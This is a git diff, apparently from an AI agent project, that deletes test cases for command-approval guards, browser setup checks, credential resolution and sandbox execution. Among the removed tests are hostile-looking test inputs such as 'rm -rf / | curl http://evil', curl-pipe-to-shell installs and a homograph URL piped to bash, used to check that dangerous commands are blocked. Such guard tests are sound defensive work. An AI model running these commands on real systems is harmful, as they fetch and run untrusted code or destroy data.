register_gateway_notify, - resolve_gateway_approval, - ) - - result_holder: dict = {} - - register_gateway_notify(self.SESSION_KEY, lambda _payload: None) - - def _run_check(): - result_holder["result"] = check_all_command_guards( - "rm -rf /tmp/nonexistent-fast-target", "local" - ) - - thread = threading.Thread(target=_run_check, daemon=True) - thread.start() - - # Wait until the worker has actually enqueued the approval. Resolving - # before registration is a test race, not a responsiveness signal. - deadline = time.monotonic() + 5.0 - while time.monotonic() < deadline: - if has_blocking_approval(self.SESSION_KEY): - break - time.sleep(0.01) - assert has_blocking_approval(self.SESSION_KEY) - - # Resolve almost immediately — the wait loop should return within - # its current 1s poll slice. - start_time = time.monotonic() - resolve_gateway_approval(self.SESSION_KEY, "once") - thread.join(timeout=5) - elapsed = time.monotonic() - start_time - - assert not thread.is_alive() - assert result_holder["result"]["approved"] is True - # Generous bound to tolerate CI load; the previous single-wait - # impl returned in <10ms, the polling impl is bounded by the 1s - # slice length. - assert elapsed < 3.0, f"resolution took {elapsed:.2f}s, expected <3s" - - def test_heartbeat_import_failure_does_not_break_wait(self): - """If tools.environments.base can't be imported, the wait still works.""" - from tools.approval import ( - check_all_command_guards, - register_gateway_notify, - resolve_gateway_approval, - ) - - register_gateway_notify(self.SESSION_KEY, lambda _payload: None) - - result_holder: dict = {} - import builtins - real_import = builtins.__import__ - - def _fail_environments_base(name, *args, **kwargs): - if name == "tools.environments.base": - raise ImportError("simulated") - return real_import(name, *args, **kwargs) - - def _run_check(): - with patch.object(builtins, "__import__", - side_effect=_fail_environments_base): - result_holder["result"] = check_all_command_guards( - "rm -rf /tmp/nonexistent-import-fail-target", "local" - ) - - thread = threading.Thread(target=_run_check, daemon=True) - thread.start() - - time.sleep(0.2) - resolve_gateway_approval(self.SESSION_KEY, "once") - thread.join(timeout=5) - - assert not thread.is_alive() - # Even when heartbeat import fails, the approval flow completes. - assert result_holder["result"]["approved"] is True diff --git a/tests/tools/test_approval_plugin_hooks.py b/tests/tools/test_approval_plugin_hooks.py index 29489cf877..4d981889f9 100644 --- a/tests/tools/test_approval_plugin_hooks.py +++ b/tests/tools/test_approval_plugin_hooks.py @@ -142,107 +142,4 @@ class TestGatewayPathFiresHooks: approval event until resolve_gateway_approval() is called from another thread.""" - def test_pre_and_post_fire_on_gateway_surface( - self, isolated_session, monkeypatch - ): - import threading - monkeypatch.delenv("HERMES_INTERACTIVE", raising=False) - monkeypatch.setenv("HERMES_GATEWAY_SESSION", "1") - monkeypatch.delenv("HERMES_EXEC_ASK", raising=False) - monkeypatch.setattr(approval_module, "_get_approval_mode", lambda: "manual") - # Short gateway_timeout so a buggy test fails fast instead of hanging - monkeypatch.setattr( - approval_module, "_get_approval_config", lambda: {"gateway_timeout": 10} - ) - - captured = [] - - def fake_invoke_hook(hook_name, **kwargs): - captured.append((hook_name, kwargs)) - return [] - - notify_seen = threading.Event() - - def notify_cb(approval_data): - notify_seen.set() - - register_gateway_notify(isolated_session, notify_cb) - result_holder = {} - - def run_guard(): - with patch("hermes_cli.plugins.invoke_hook", side_effect=fake_invoke_hook): - result_holder["result"] = check_all_command_guards( - "rm -rf /tmp/test-gateway-hook", "local", - ) - - t = threading.Thread(target=run_guard, daemon=True) - t.start() - - # Wait for the gateway callback to see the approval request - assert notify_seen.wait(timeout=5), "Gateway notify never fired" - - # User approves from the "other thread" (simulating /approve command) - resolve_gateway_approval(isolated_session, "once") - - t.join(timeout=5) - assert not t.is_alive(), "Agent thread never unblocked" - unregister_gateway_notify(isolated_session) - - assert result_holder["result"]["approved"] is True - - hook_names = [c[0] for c in captured] - assert "pre_approval_request" in hook_names - assert "post_approval_response" in hook_names - - pre_kwargs = next(kw for name, kw in captured if name == "pre_approval_request") - assert pre_kwargs["surface"] == "gateway" - assert pre_kwargs["command"] == "rm -rf /tmp/test-gateway-hook" - - post_kwargs = next(kw for name, kw in captured if name == "post_approval_response") - assert post_kwargs["surface"] == "gateway" - assert post_kwargs["choice"] == "once" - - def test_timeout_reports_timeout_choice(self, isolated_session, monkeypatch): - import threading - - monkeypatch.delenv("HERMES_INTERACTIVE", raising=False) - monkeypatch.setenv("HERMES_GATEWAY_SESSION", "1") - monkeypatch.delenv("HERMES_EXEC_ASK", raising=False) - monkeypatch.setattr(approval_module, "_get_approval_mode", lambda: "manual") - monkeypatch.setattr( - approval_module, "_get_approval_config", lambda: {"gateway_timeout": 1} - ) - - captured = [] - - def fake_invoke_hook(hook_name, **kwargs): - captured.append((hook_name, kwargs)) - return [] - - notify_seen = threading.Event() - - def notify_cb(approval_data): - notify_seen.set() - - register_gateway_notify(isolated_session, notify_cb) - result_holder = {} - - def run_guard(): - with patch("hermes_cli.plugins.invoke_hook", side_effect=fake_invoke_hook): - result_holder["result"] = check_all_command_guards( - "rm -rf /tmp/test-gateway-timeout", "local", - ) - - t = threading.Thread(target=run_guard, daemon=True) - t.start() - assert notify_seen.wait(timeout=5) - # Deliberately do NOT resolve -- let it time out - t.join(timeout=5) - assert not t.is_alive() - unregister_gateway_notify(isolated_session) - - assert result_holder["result"]["approved"] is False - - post_kwargs = next(kw for name, kw in captured if name == "post_approval_response") - assert post_kwargs["choice"] == "timeout" diff --git a/tests/tools/test_browser_chromium_check.py b/tests/tools/test_browser_chromium_check.py index a09758a28e..ef3fca4352 100644 --- a/tests/tools/test_browser_chromium_check.py +++ b/tests/tools/test_browser_chromium_check.py @@ -51,25 +51,8 @@ class TestChromiumInstalled: (tmp_path / "chromium_headless_shell-1208").mkdir() assert bt._chromium_installed() is True - def test_false_when_dir_empty(self, monkeypatch, tmp_path): - monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(tmp_path)) - monkeypatch.setattr("os.path.expanduser", lambda p: str(tmp_path / "fakehome")) - assert bt._chromium_installed() is False - def test_false_when_only_unrelated_browsers(self, monkeypatch, tmp_path): - monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(tmp_path)) - monkeypatch.setattr("os.path.expanduser", lambda p: str(tmp_path / "fakehome")) - (tmp_path / "firefox-1234").mkdir() - (tmp_path / "webkit-5678").mkdir() - assert bt._chromium_installed() is False - def test_false_when_path_not_a_dir(self, monkeypatch, tmp_path): - # User points PLAYWRIGHT_BROWSERS_PATH at a file by mistake. - bogus = tmp_path / "nope" - bogus.write_text("") - monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(bogus)) - monkeypatch.setattr("os.path.expanduser", lambda p: str(tmp_path / "fakehome")) - assert bt._chromium_installed() is False def test_result_cached(self, monkeypatch, tmp_path): monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(tmp_path)) @@ -81,15 +64,6 @@ class TestChromiumInstalled: class TestCheckBrowserRequirementsChromium: - def test_local_mode_missing_chromium_returns_false(self, monkeypatch, tmp_path): - monkeypatch.setattr(bt, "_is_camofox_mode", lambda: False) - monkeypatch.setattr(bt, "_find_agent_browser", lambda: "/usr/local/bin/agent-browser") - monkeypatch.setattr(bt, "_requires_real_termux_browser_install", lambda _: False) - monkeypatch.setattr(bt, "_get_cloud_provider", lambda: None) - monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(tmp_path)) - monkeypatch.setattr("os.path.expanduser", lambda p: str(tmp_path / "fakehome")) - - assert bt.check_browser_requirements() is False def test_local_mode_with_chromium_returns_true(self, monkeypatch, tmp_path): monkeypatch.setattr(bt, "_is_camofox_mode", lambda: False) @@ -133,44 +107,5 @@ class TestRunBrowserCommandChromiumGuard: Chromium is missing in local mode. """ - def test_local_mode_missing_chromium_returns_error_immediately(self, monkeypatch, tmp_path): - monkeypatch.setattr(bt, "_find_agent_browser", lambda: "/usr/local/bin/agent-browser") - monkeypatch.setattr(bt, "_requires_real_termux_browser_install", lambda _: False) - monkeypatch.setattr(bt, "_is_local_mode", lambda: True) - monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(tmp_path)) - monkeypatch.setattr("os.path.expanduser", lambda p: str(tmp_path / "fakehome")) - # If we ever reached subprocess.Popen the test would hang — the - # fast-fail guard prevents that. - def _fail_popen(*args, **kwargs): - raise AssertionError("Should have failed before spawning subprocess") - monkeypatch.setattr("subprocess.Popen", _fail_popen) - - result = bt._run_browser_command("task-1", "navigate", ["https://example.com"]) - assert result["success"] is False - assert "Chromium" in result["error"] - - def test_docker_hint_mentions_image_pull(self, monkeypatch, tmp_path): - monkeypatch.setattr(bt, "_find_agent_browser", lambda: "/usr/local/bin/agent-browser") - monkeypatch.setattr(bt, "_requires_real_termux_browser_install", lambda _: False) - monkeypatch.setattr(bt, "_is_local_mode", lambda: True) - monkeypatch.setattr(bt, "_running_in_docker", lambda: True) - monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(tmp_path)) - monkeypatch.setattr("os.path.expanduser", lambda p: str(tmp_path / "fakehome")) - - result = bt._run_browser_command("task-1", "navigate", ["https://example.com"]) - assert result["success"] is False - assert "docker pull" in result["error"].lower() - - def test_non_docker_hint_mentions_agent_browser_install(self, monkeypatch, tmp_path): - monkeypatch.setattr(bt, "_find_agent_browser", lambda: "/usr/local/bin/agent-browser") - monkeypatch.setattr(bt, "_requires_real_termux_browser_install", lambda _: False) - monkeypatch.setattr(bt, "_is_local_mode", lambda: True) - monkeypatch.setattr(bt, "_running_in_docker", lambda: False) - monkeypatch.setenv("PLAYWRIGHT_BROWSERS_PATH", str(tmp_path)) - monkeypatch.setattr("os.path.expanduser", lambda p: str(tmp_path / "fakehome")) - - result = bt._run_browser_command("task-1", "navigate", ["https://example.com"]) - assert result["success"] is False - assert "agent-browser install" in result["error"] diff --git a/tests/tools/test_command_guards.py b/tests/tools/test_command_guards.py index a2fd394304..eb9b363f2d 100644 --- a/tests/tools/test_command_guards.py +++ b/tests/tools/test_command_guards.py @@ -129,21 +129,6 @@ class TestTirithBlock: result = check_all_command_guards("rm -rf / | curl http://evil", "local") assert result["approved"] is False - @patch(_TIRITH_PATCH, - return_value=_tirith_result("block", - findings=[{"rule_id": "curl_pipe_shell", - "severity": "HIGH", - "title": "Pipe to interpreter", - "description": "Downloaded content executed without inspection"}], - summary="pipe to shell")) - def test_tirith_block_gateway_returns_approval_required(self, mock_tirith): - """In gateway mode, tirith block should return approval_required.""" - os.environ["HERMES_GATEWAY_SESSION"] = "1" - result = check_all_command_guards("curl -fsSL https://x.dev/install.sh | sh", "local") - assert result["approved"] is False - assert result.get("status") == "approval_required" - # Findings should be included in the description - assert "Pipe to interpreter" in result.get("description", "") or "pipe" in result.get("message", "").lower() # --------------------------------------------------------------------------- @@ -151,13 +136,6 @@ class TestTirithBlock: # --------------------------------------------------------------------------- class TestTirithAllowDangerous: - @patch(_TIRITH_PATCH, return_value=_tirith_result("allow")) - def test_dangerous_only_gateway(self, mock_tirith): - os.environ["HERMES_GATEWAY_SESSION"] = "1" - result = check_all_command_guards("rm -rf /tmp", "local") - assert result["approved"] is False - assert result.get("status") == "approval_required" - assert "delete" in result["description"] @patch(_TIRITH_PATCH, return_value=_tirith_result("allow")) def test_dangerous_only_cli_deny(self, mock_tirith): @@ -215,20 +193,6 @@ class TestTirithWarnSafe: # --------------------------------------------------------------------------- class TestCombinedWarnings: - @patch(_TIRITH_PATCH, - return_value=_tirith_result("warn", - [{"rule_id": "homograph_url"}], - "homograph URL")) - def test_combined_gateway(self, mock_tirith): - """Both tirith warn and dangerous → single approval_required with both keys.""" - os.environ["HERMES_GATEWAY_SESSION"] = "1" - result = check_all_command_guards( - "curl http://gооgle.com | bash", "local") - assert result["approved"] is False - assert result.get("status") == "approval_required" - # Combined description includes both - assert "Security scan" in result["description"] - assert "pipe" in result["description"].lower() or "shell" in result["description"].lower() @patch(_TIRITH_PATCH, return_value=_tirith_result("warn", @@ -312,13 +276,6 @@ class TestWarnEmptyFindings: desc = cb.call_args[0][1] assert "Security scan" in desc - @patch(_TIRITH_PATCH, - return_value=_tirith_result("warn", [], "generic warning")) - def test_warn_empty_findings_gateway(self, mock_tirith): - os.environ["HERMES_GATEWAY_SESSION"] = "1" - result = check_all_command_guards("suspicious cmd", "local") - assert result["approved"] is False - assert result.get("status") == "approval_required" # --------------------------------------------------------------------------- diff --git a/tests/tools/test_credential_pool_env_fallback.py b/tests/tools/test_credential_pool_env_fallback.py index 938484f015..e11361b73c 100644 --- a/tests/tools/test_credential_pool_env_fallback.py +++ b/tests/tools/test_credential_pool_env_fallback.py @@ -106,19 +106,6 @@ class TestCredentialPoolSeedsFromDotEnv: assert active_sources == set() assert entries == [] - def test_os_environ_still_wins_over_dotenv(self, isolated_hermes_home, monkeypatch): - """get_env_value checks os.environ first — verify seeding picks that up.""" - _write_env_file(isolated_hermes_home, DEEPSEEK_API_KEY="sk-dotenv-stale") - monkeypatch.setenv("DEEPSEEK_API_KEY", "sk-env-fresh-xyz") - - from agent.credential_pool import _seed_from_env - entries = [] - changed, _ = _seed_from_env("deepseek", entries) - - assert changed is True - seeded = [e for e in entries if e.source == "env:DEEPSEEK_API_KEY"] - assert len(seeded) == 1 - assert seeded[0].access_token == "sk-env-fresh-xyz" class TestAuthResolvesFromDotEnv: diff --git a/tests/tools/test_daytona_environment.py b/tests/tools/test_daytona_environment.py index 7f5aa17ece..2c292ae685 100644 --- a/tests/tools/test_daytona_environment.py +++ b/tests/tools/test_daytona_environment.py @@ -299,24 +299,6 @@ class TestExecute: assert "print" in cmd assert "hi" in cmd - def test_custom_cwd_in_command_wrapper(self, make_env): - """CWD is handled by _wrap_command() in the command string, not as a kwarg.""" - sb = _make_sandbox() - sb.process.exec.side_effect = [ - _make_exec_response(result="/root"), - _make_exec_response(result="", exit_code=0), # init_session - _make_exec_response(result="/tmp", exit_code=0), - ] - sb.state = "started" - env = make_env(sandbox=sb) - - env.execute("pwd", cwd="/tmp") - # CWD should be embedded in the command string via _wrap_command - call_args = sb.process.exec.call_args_list[-1] - cmd = call_args[0][0] - assert "cd /tmp" in cmd - # CWD should NOT be passed as a kwarg to exec - assert "cwd" not in call_args[1] def test_daytona_error_triggers_retry(self, make_env, daytona_sdk): sb = _make_sandbox() diff --git a/tests/tools/test_delegate.py b/tests/tools/test_delegate.py index c45de2a581..3a6df2bcf4 100644 --- a/tests/tools/test_delegate.py +++ b/tests/tools/test_delegate.py @@ -767,44 +767,7 @@ class TestDelegationCredentialResolution(unittest.TestCase): self.assertIsNone(creds["base_url"]) self.assertIsNone(creds["api_key"]) - @patch("hermes_cli.runtime_provider.resolve_runtime_provider") - def test_provider_resolves_full_credentials(self, mock_resolve): - """When delegation.provider is set, full credentials are resolved.""" - mock_resolve.return_value = { - "provider": "openrouter", - "base_url": "https://openrouter.ai/api/v1", - "api_key": "sk-or-test-key", - "api_mode": "chat_completions", - } - parent = _make_mock_parent(depth=0) - cfg = {"model": "google/gemini-3-flash-preview", "provider": "openrouter"} - creds = _resolve_delegation_credentials(cfg, parent) - self.assertEqual(creds["model"], "google/gemini-3-flash-preview") - self.assertEqual(creds["provider"], "openrouter") - self.assertEqual(creds["base_url"], "https://openrouter.ai/api/v1") - self.assertEqual(creds["api_key"], "sk-or-test-key") - self.assertEqual(creds["api_mode"], "chat_completions") - mock_resolve.assert_called_once_with(requested="openrouter") - @patch("hermes_cli.runtime_provider.resolve_runtime_provider") - def test_provider_resolution_uses_runtime_model_when_config_model_missing(self, mock_resolve): - """Named providers should propagate their runtime default model to children.""" - mock_resolve.return_value = { - "provider": "custom", - "base_url": "https://my-server.example/v1", - "api_key": "sk-test-key", - "api_mode": "chat_completions", - "model": "server-default-model", - } - parent = _make_mock_parent(depth=0) - cfg = {"provider": "custom:my-server", "model": ""} - - creds = _resolve_delegation_credentials(cfg, parent) - - self.assertEqual(creds["model"], "server-default-model") - self.assertEqual(creds["provider"], "custom") - self.assertEqual(creds["base_url"], "https://my-server.example/v1") - mock_resolve.assert_called_once_with(requested="custom:my-server") def test_direct_endpoint_uses_configured_base_url_and_api_key(self): parent = _make_mock_parent(depth=0) @@ -853,22 +816,6 @@ class TestDelegationCredentialResolution(unittest.TestCase): self.assertIsNone(creds["api_key"]) self.assertEqual(creds["provider"], "custom") - @patch("hermes_cli.runtime_provider.resolve_runtime_provider") - def test_nous_provider_resolves_nous_credentials(self, mock_resolve): - """Nous provider resolves Nous Portal base_url and api_key.""" - mock_resolve.return_value = { - "provider": "nous", - "base_url": "https://inference-api.nousresearch.com/v1", - "api_key": "nous-agent-key-xyz", - "api_mode": "chat_completions", - } - parent = _make_mock_parent(depth=0) - cfg = {"model": "hermes-3-llama-3.1-8b", "provider": "nous"} - creds = _resolve_delegation_credentials(cfg, parent) - self.assertEqual(creds["provider"], "nous") - self.assertEqual(creds["base_url"], "https://inference-api.nousresearch.com/v1") - self.assertEqual(creds["api_key"], "nous-agent-key-xyz") - mock_resolve.assert_called_once_with(requested="nous") @patch("hermes_cli.runtime_provider.resolve_runtime_provider") def test_provider_resolution_failure_raises_valueerror(self, mock_resolve): @@ -1599,53 +1546,6 @@ class TestDelegateHeartbeat(unittest.TestCase): f"got {len(touch_calls)} touches over 0.4s at 0.05s interval", ) - def test_heartbeat_still_trips_idle_stale_when_no_tool(self): - """A wedged child with no current_tool still trips the idle threshold. - - Regression guard: the fix for #13041 must not disable stale - detection entirely. A child that's hung between turns (no tool - running, no iteration progress) must still stop touching the - parent so the gateway timeout can fire. - """ - from tools.delegate_tool import _run_single_child - - parent = _make_mock_parent() - touch_calls = [] - parent._touch_activity = lambda desc: touch_calls.append(desc) - - child = MagicMock() - # Wedged child: no tool running, iteration frozen. - child.get_activity_summary.return_value = { - "current_tool": None, - "api_call_count": 3, - "max_iterations": 50, - "last_activity_desc": "waiting for API response", - } - - def slow_run(**kwargs): - time.sleep(0.6) - return {"final_response": "done", "completed": True, "api_calls": 3} - - child.run_conversation.side_effect = slow_run - - # At interval 0.05s, idle threshold (5 cycles) trips at ~0.25s. - # We should see the heartbeat stop firing well before 0.6s. - with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05): - _run_single_child( - task_index=0, - goal="Test wedged child", - child=child, - parent_agent=parent, - ) - - # With idle threshold=5 + interval=0.05s, touches should cap - # around 5. Bound loosely to avoid timing flakes. - self.assertLess( - len(touch_calls), 9, - f"Idle stale detection did not fire: got {len(touch_calls)} " - f"touches over 0.6s — expected heartbeat to stop after " - f"~5 stale cycles", - ) class TestDelegationReasoningEffort(unittest.TestCase): diff --git a/tests/tools/test_skill_provenance.py b/tests/tools/test_skill_provenance.py index 77f505bb86..8cbecc000b 100644 --- a/tests/tools/test_skill_provenance.py +++ b/tests/tools/test_skill_provenance.py @@ -5,12 +5,6 @@ import contextvars import pytest -def test_default_origin_is_foreground(): - from tools.skill_provenance import get_current_write_origin - # In a fresh ContextVar context, default kicks in. - ctx = contextvars.copy_context() - origin = ctx.run(get_current_write_origin) - assert origin == "foreground" def test_set_and_get_origin(): diff --git a/tests/tools/test_vercel_sandbox_environment.py b/tests/tools/test_vercel_sandbox_environment.py index 944621fe89..afeeb8cedf 100644 --- a/tests/tools/test_vercel_sandbox_environment.py +++ b/tests/tools/test_vercel_sandbox_environment.py @@ -426,23 +426,6 @@ class TestFileSync: class TestExecute: - def test_execute_runs_command_from_workspace_root_and_updates_cwd( - self, make_env, vercel_sdk - ): - env = make_env() - vercel_sdk.current.run_command_side_effects.append( - _cwd_result("/tmp", cwd="/tmp") - ) - - result = env.execute("pwd", cwd="/tmp") - - assert result == {"output": "/tmp\n", "returncode": 0} - assert env.cwd == "/tmp" - cmd, args, kwargs = vercel_sdk.current.run_command_calls[-1] - assert cmd == "bash" - assert args[0] == "-c" - assert "cd /tmp" in args[1] - assert kwargs["cwd"] == "/vercel/sandbox" @pytest.mark.parametrize( ("make_unhealthy", "label"),